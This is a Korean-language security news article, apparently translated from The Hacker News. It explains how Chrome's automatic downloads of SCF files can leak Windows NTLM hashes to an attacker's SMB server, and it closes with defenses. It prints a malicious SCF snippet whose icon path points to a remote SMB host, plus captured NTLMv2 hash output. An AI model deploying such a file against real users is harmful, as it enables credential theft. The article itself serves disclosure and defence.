크롬을 이용해 원격으로 윈도우 패스워드를 훔칠 수 있는 취약점 발견 돼

크롬을 이용해 원격으로 윈도우 패스워드를 훔칠 수 있는 취약점 발견 돼

Beware! Hackers Can Steal Your Windows Password Remotely Using Chrome

한 보안 연구원이 구글의 윈도우 모든 버전용 크롬 최신 버전의 디폴트 구성에서 원격의 해커가 사용자의 로그인 크리덴셜을 훔치는데 사용할 수 있는 심각한 취약점을 발견했습니다. 

이번에 발견된 취약점은 사용자들이 악성 SCF 파일을 포함하는 웹사이트를 방문하는 것 만으로도 해커가 크롬 및 SMB 프로토콜을 통해 그들 컴퓨터의 로그인 크리덴셜을 훔치도록 허용합니다.

이 기술은 새로운 것은 아니며, 이란의 핵 프로그램을 파괴시키도록 특별히 제작 된 강력한 멀웨어인 Stuxnet이 악용한 적 있습니다. Stuxnet은 시스템 해킹을 위해 윈도우의 바로가기 LNK 파일을 사용했습니다. 

이 공격이 다른 것들과 다른 점은, SMB 인증 관련 공격이 IE와 Edge 이후 처음으로 구글 크롬에서 시연 되었다는 것입니다.

크롬 + SCF + SMB = 윈도우 크리덴셜 훔치기

SCF (Shell Command File) 바로가기 파일 포맷은 LNK 파일과 유사하게 동작하며, 바탕화면의 아이콘을 정의하는데 도움을 주는 제한 된 윈도우 익스플로러 명령어 세트를 지원합니다.

보안연구원 Stankovic은 블로그를 통해 “현재 공격자는 크롬 최신 버전과 윈도우를 사용하는 피해자가 그의 웹사이트를 방문하도록 유도하기만 하면, 피해자의 인증 크리덴셜을 재사용할 수 있게 된다.”고 밝혔습니다. 

기본적으로, 바탕화면의 바로가기 링크들은 아이콘/썸네일의 위치, 프로그램의 이름 및 위치를 정의하는 특정 문법의 shell code를 포함하는 텍스트 파일입니다. 

[Shell]

Command=2

IconFile=explorer.exe,3

크롬이 윈도우 SCF 파일을 신뢰하기 때문에, 공격자들은 피해자들이 악성 바로가기 파일을 포함한 자신들의 웹사이트로 방문하도록 속이기만 하면 악성 파일은 피해자에게 확인 창도 띄우지 않고 사용자 시스템에 자동으로 다운로드 될 것입니다. 

사용자가 다운로드 즉시 또는 나중에 다운로드 파일 폴더를 열기만 하면, 이 파일은 아이콘을 받아오기 위해 사용자가 클릭하지 않아도 자동으로 실행 될 것입니다. 

하지만 이 악성 파일은 아이콘 이미지 위치 대신 공격자가 제어하는 원격 SMB 서버의 위치를 포함하고 있습니다.

[Shell]

IconFile=\\170.170.170.170\icon

즉, SCF 파일이 아이콘 이미지를 받아오려고 시도하는 순간 SMB 프로토콜을 통해 공격자가 제어하는 서버와 자동으로 인증해 피해자의 계정 및 해싱 된 패스워드를 넘겨줘 공격자가 크리데셜을 이용해 피해자의 PC나 네트워크 리소스에 인증하는데 사용할 수 있게 되는 것입니다. 

Stankovic은 “아이콘 위치를 원격 SMB 서버로 설정하는 것은 원격 파일 공유와 같은 서비스에 접근할 때 자동으로 인증하는 윈도우의 기능을 악용하는, 이미 알려진 공격 벡터이다.”고 말했습니다.

Stuxnet 공격 이후 마이크로소프트는 LNK파일들이 로컬 리소스만 불러오도록 수정했지만, SCF 파일들은 그대로 두었습니다. 

SCF 파일을 통한 LM/NTLM 해시 인증 악용

<이미지 출처 : http://thehackernews.com/2017/05/chrome-windows-password-hacking.html>

윈도우 PC가 자동으로 크리덴셜을 서버로 넘겨주는 이유는 무엇일까?

이는 NTLM 챌린지/응답 인증 메커니즘과 함께 동작하는 SMB 프로토콜을 통한 인증 방식입니다. 즉 LM/NTLM 인증은 아래 4단계로 작동합니다. 

1) 윈도우 사용자(클라이언트)가 서버에 로그인을 시도한다.

2) 서버는 챌린지 값으로 응답하며, 사용자에게 챌린지 값을 사용자의 해싱 된 패스워드로 암호화 후 다시 보내라고 요청한다.

3) 윈도우는 클라이언트의 계정 및 해싱 된 패스워드를 서버로 보내 SCF의 요청을 처리한다.

4) 서버는 클라이언트의 해싱 된 패스워드가 맞을 경우 응답을 캡쳐하고 인증을 승인한다.

위의 3단계와 같이 윈도우는 자동으로 악성 SMB 서버에 피해자의 계정 및 NTLMv2 패스워드 해시를 제공해 인증하려고 시도할 것입니다. 

만약 사용자가 기업 네트워크의 한 부분일 경우, 회사의 시스템 관리자가 해당 사용자에게 할당한 네트워크 크리덴셜들도 공격자에게 보내질 것이며, 피해자가 일반 사용자일 경우, 피해자의 윈도우 계정 및 패스워드가 공격자에게 보내질 것입니다.

[*] SMB Captured - 2017-05-15 13:10:44 +0200

NTLMv2 Response Captured from 173.203.29.182:62521 - 173.203.29.182

USER:Bosko DOMAIN:Master OS: LM:

LMHASH:Disabled

LM_CLIENT_CHALLENGE:Disabled

NTHASH:98daf39c3a253bbe4a289e7a746d4b24

NT_CLIENT_CHALLENGE:01010000000000000e5f83e06fcdd201ccf26d91cd9e326e000000000200000000000

00000000000

Bosko::Master:1122334455667788:98daf39c3a253bbe4a289e7a746d4b24:01010000000000000e5f83e06fcdd201ccf26d91cd9e326e00000000020000000000000000000000

물론 크리덴셜은 암호화 되어있지만, 나중에 플레인 텍스트 형태의 패스워드를 얻기 위해 브루트포싱 공격에 이용될 수 있습니다.

또한 이 연구원은 “폴더의 세팅에 상관없이 SCF 파일은 윈도우 탐색기에서 확장명이 없는 상태로 표시 됩니다. 따라서 picture.jpg.scf 파일은 윈도우 탐색기에서 picture.jpg로 표시 될 것입니다.

가끔은 암호를 복호화할 필요가 없다

다수의 마이크로소프트 서비스들이 해싱 된 상태의 패스워드를 받아들이기 때문에, 공격자는 피해자의 OneDrive, Outlook.com, Office 365, Office Online, Skype, Xbox Live 등에 암호화 된 패스워드로 로그인할 수 있어 복호화 과정이 필요가 없게 됩니다.

연구원은 이러한 취약점은 공격자가 조직의 직원들 중 하나로 사칭할 수 있기 때문에 조직에 심각한 위협을 가할 수 있다고 설명했습니다. 공격자가 얻은 권한을 재사용해 나중에 IT 리소스에 접근 및 제어하며 다른 조직원들도 공격하는데 사용할 수 있기 때문입니다. 

SMB 인증 관련 공격을 예방하는 방법

로컬 컴퓨터들이 원격 SMB 서버에 쿼리를 할 수 없도록, 방화벽을 통해 로컬 네트워크로부터 WAN으로의 아웃바운드 SMB 연결(TCP 포트 139 및 445)을 차단하면 됩니다. 

또한 구글 크롬에서 설정 -> 고급 설정 보기 -> “다운로드 하기 전 각 파일을 저장할 위치 묻기” 옵션을 선택해 크롬에서 자동으로 다운로드 하지 않도록 설정하는것을 권장합니다.

현재 구글은 이 취약점을 이미 알고 있으며 패치를 준비하는 중이라고 밝혔으나, 패치를 언제 제공할지는 밝히지 않았습니다. 

출처 : 

http://thehackernews.com/2017/05/chrome-windows-password-hacking.html